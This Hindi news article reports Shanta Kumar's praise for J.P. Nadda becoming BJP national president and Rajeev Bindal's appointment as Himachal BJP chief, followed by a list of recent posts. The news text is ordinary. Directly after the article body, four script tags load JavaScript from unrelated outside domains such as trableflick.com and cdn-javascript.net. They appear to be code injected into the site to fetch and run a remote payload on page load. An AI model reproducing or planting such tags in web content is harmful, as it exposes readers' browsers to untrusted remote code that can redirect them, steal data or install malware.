नड्डा का विश्व की सबसे बड़ी राजनीतिक दल का राष्ट्रीय अध्यक्ष बनना हिमाचल के लिए गौरव की बातः शांता कुमार

<p>भाजपा के वरिष्ठ नेता शांता कुमार ने कहा कि जगत प्रकाश नड्डा का विश्व की सबसे बड़ी राजनीतिक दल का राष्ट्रीय अध्यक्ष बनना हिमाचल जैसे प्रदेश के लिए बहुत गौरव की बात है। उन्होंने कहा कि नड्डा का कार्य हमेशा ही प्रशंसनीय रहा है और वह हमेशा सीखने की राजनीति करते रहे हैं। भाजयुमो के राष्ट्रीय अध्यक्ष उन्हें मैंने अपने कार्यकाल में जब बनाया था तो पूर्व प्रधानमंत्री अटल बिहारी वाजपेई नाराज भी हुए थे। लेकिन हमने उसी समय कह दिया था कि पार्टी को आगे भी हमें और नेताओं को तैयार करना है। इसलिए यह व्यक्ति बिल्कुल उस जिम्मेदारी को संभालने के लिए उपयुक्त है और आज मैं इस बात से बहुत प्रसन्न हूं कि हमारे साथ चलता हुआ यह बच्चा आज विश्व की सबसे बड़ी पार्टी का अध्यक्ष बनाया जा रहा है। इसके साथ ही शांता कुमार ने कहा कि हिमाचल को राष्ट्रीय अध्यक्ष मिलेगा तो हिमाचल का अधिकार भी उनके ऊपर ज्यादा होगा। इसलिए उनके अध्यक्ष बनने की पर हिमाचल को गौरव मंदिर महसूस करना चाहिए। वहीं, प्रदेश को भी डॉ. राजीव बिंदल के रूप में अध्यक्ष मिलने जा रहा है।</p>

<p>इस पर शांता कुमार ने कहा कि भाजपा में हमेशा ही परंपरा रही है कि आपसी सहमति के साथ चुनाव होते हैं। चाहे वह मंडल सर पर हूं चाहे वह प्रदेश तत्पर हूं चाहे वह राष्ट्रीय स्तर पर और एक संदेश जरूर इस चुनाव से पूरे देश और विश्व में जाता है कि आपसी भाईचारे के साथ भाजपा कैसे आगे बढ़ रही है। उन्होंने कहा कि डॉक्टर जी बिंदल का नाम अध्यक्ष के रूप में कई नामों के ऊपर चर्चा करने के बाद और सभी नेताओं के विचार विमर्श के बाद ही तय हुआ है, इसलिए मैं यह कह सकता हूं कि बिंदल पूरी पार्टी को साथ लेकर चलेंगे और एक सशक्त भाजपा बिंदल के नेतृत्व में भी प्रदेश में काम करेगी। जैसा कि सतपाल सिंह सत्ती के कार्यकाल में भाजपा ने नई ऊंचाइयों को प्रदेश में छुआ और सतपाल सिंह सत्ती का काम भी प्रदेश में बहुत बढ़िया रहा। हालांकि वह अपना चुनाव हार गए लेकिन इस बात का उनके राजनीतिक कद पर कोई फर्क नहीं पड़ता पार्टी में उनका पूरा मान-सम्मान है बताते चलें कि पंडित दीनदयाल उपाध्याय रोड पर भाजपा का राष्ट्रीय कार्यालय है और वहां पर 20 तारीख को जगत प्रकाश नड्डा की ताजपोशी होने जा रही है।</p>

<p>इस ताजपोशी में एक तरफ जहां केंद्र में सभी मंत्री उपस्थित रहेंगे। वहीं, इसके अलावा पार्टी के वरिष्ठ कार्यकर्ता जिनमें लालकृष्ण आडवाणी, मुरली मनोहर जोशी, शांता कुमार जैसे चेहरे जिन्होंने भाजपा को पूरे देश में स्थापित किया था। वह भी प्रमुख रूप से उपस्थित रहेंगे। इसी के साथ सभी प्रदेशों से मुख्यमंत्री खुद प्रधानमंत्री नरेंद्र मोदी गृहमंत्री अमित शाह भी इस कार्यक्रम में मौजूद रहेंगे। सूत्रों से मिली जानकारी के अनुसार बड़े स्तर पर इस कार्यक्रम को किया जा रहा है और एक भव्य कार्यक्रम जगत प्रकाश नड्डा की ताजपोशी का नई दिल्ली में पार्टी कार्यालय में होने जा रहा है। जहां तक हिमाचल प्रदेश की बात है तो मुख्यमंत्री जयराम ठाकुर पूर्व मुख्यमंत्री प्रेम कुमार धूमल, पूर्व केंद्रीय मंत्री शांता कुमार, संगठन मंत्री पवन राणा, मौजूदा अध्यक्ष सतपाल सिंह सत्ती सहित प्रदेश के कई बड़े नेता जगत प्रकाश नड्डा की स्थिति में जाने वाले हैं।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1579170149778″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Una News: टोल बैरियर के कैबिन में घुसा अनियंत्रित वाहन, खाना खा रहे दो कर्मियों की मौत, एक गंभीर

Ajouli toll booth crash: सोमवार दोपहर को पंजाब के नंगल से संतोषगढ़ की ओर जाने…

6 mins ago

National: भुंतर से जयपुर के बीच अब सीधी उड़ान, किराया 2500 रुपये

  Kullu-Jaipur Air Service : सोमवार को कुल्लू के भुंतर एयरपोर्ट से जयपुर के लिए…

1 hour ago

Mandi mosque Dispute: कोर्ट ने एमसी आयुक्त के आदेश पर लगाई रोक, मुस्लिम पक्ष को राहत

MANDI:  जेल रोड में मस्जिद में कथित अवैध निर्माण मामले में मुस्लिम पक्ष को राहत…

3 hours ago

हमीरपुर डीसी कार्यालय में सिखाए आपदा से निपटने के गुर

Mock drill at DC office : सोमवार को उपायुक्त कार्यालय परिसर में जिला आपदा प्रबंधन…

3 hours ago

Hamirpur News: आशा वर्कर्स ने उठाई स्थाई नीति और रिटायरमेंट बेनिफिट्स की मांग

Asha Worker:  आशा वर्कर्स, जो लंबे समय से ग्रामीण और शहरी क्षेत्रों में स्वास्थ्य सेवाएं…

3 hours ago

Hamirpur News: एनएच निर्माण कंपनी पर आस्था को ठेस पहुंचाने का आरोप, ग्रामीणों ने दी चेतावनी

नेशनल हाईवे नंबर तीन का निर्माण कर रही सूर्य कंस्ट्रक्शन कंपनी के खिलाफ स्थानीय ग्रामीणों…

3 hours ago